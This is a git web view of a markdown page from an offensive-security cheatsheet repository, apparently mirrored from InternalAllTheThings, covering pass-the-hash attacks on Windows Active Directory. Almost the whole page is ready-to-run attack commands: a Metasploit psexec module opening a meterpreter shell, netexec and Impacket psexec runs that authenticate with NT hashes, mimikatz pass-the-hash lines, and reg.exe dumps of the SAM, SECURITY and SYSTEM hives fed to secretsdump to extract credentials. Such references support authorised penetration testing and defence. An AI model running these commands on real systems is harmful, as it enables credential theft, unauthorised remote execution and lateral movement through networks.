daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

hash-pass-the-hash.md (1952B)


      1 ---
      2 title: "Hash - Pass the Hash"
      3 section: "Active Directory"
      4 sectionSlug: "active-directory"
      5 sourcePath: "docs/active-directory/hash-pass-the-hash.md"
      6 sourceUrl: "https://github.com/swisskyrepo/InternalAllTheThings/blob/203bb0c0b290/docs/active-directory/hash-pass-the-hash.md"
      7 sha: "203bb0c0b290"
      8 isIndex: false
      9 ---
     10 
     11 # Hash - Pass the Hash
     12 
     13 The types of hashes you can use with Pass-The-Hash are NT or NTLM hashes. Since Windows Vista, attackers have been unable to pass-the-hash to local admin accounts that weren’t the built-in RID 500.
     14 
     15 * Metasploit
     16 
     17   ```powershell
     18   use exploit/windows/smb/psexec
     19   set RHOST 10.2.0.3
     20   set SMBUser jarrieta
     21   set SMBPass nastyCutt3r  
     22   # NOTE1: The password can be replaced by a hash to execute a `pass the hash` attack.
     23   # NOTE2: Require the full NT hash, you may need to add the "blank" LM (aad3b435b51404eeaad3b435b51404ee)
     24   set PAYLOAD windows/meterpreter/bind_tcp
     25   run
     26   shell
     27   ```
     28 
     29 * netexec
     30 
     31   ```powershell
     32   nxc smb 10.2.0.2/24 -u jarrieta -H 'aad3b435b51404eeaad3b435b51404ee:489a04c09a5debbc9b975356693e179d' -x "whoami"
     33   ```
     34 
     35 * Impacket suite
     36 
     37   ```powershell
     38   proxychains python ./psexec.py jarrieta@10.2.0.2 -hashes :489a04c09a5debbc9b975356693e179d
     39   ```
     40 
     41 * Windows RDP and mimikatz
     42 
     43   ```powershell
     44   sekurlsa::pth /user:Administrator /domain:contoso.local /ntlm:b73fdfe10e87b4ca5c0d957f81de6863
     45   sekurlsa::pth /user:<user name> /domain:<domain name> /ntlm:<the users ntlm hash> /run:"mstsc.exe /restrictedadmin"
     46   ```
     47 
     48 You can extract the local **SAM database** to find the local administrator hash :
     49 
     50 ```powershell
     51 C:\> reg.exe save hklm\sam c:\temp\sam.save
     52 C:\> reg.exe save hklm\security c:\temp\security.save
     53 C:\> reg.exe save hklm\system c:\temp\system.save
     54 $ secretsdump.py -sam sam.save -security security.save -system system.save LOCAL
     55 ```
     56 
     57 ## References
     58 
     59 * [Passing the hash with native RDP client (mstsc.exe)](https://michael-eder.net/post/2018/native_rdp_pass_the_hash/)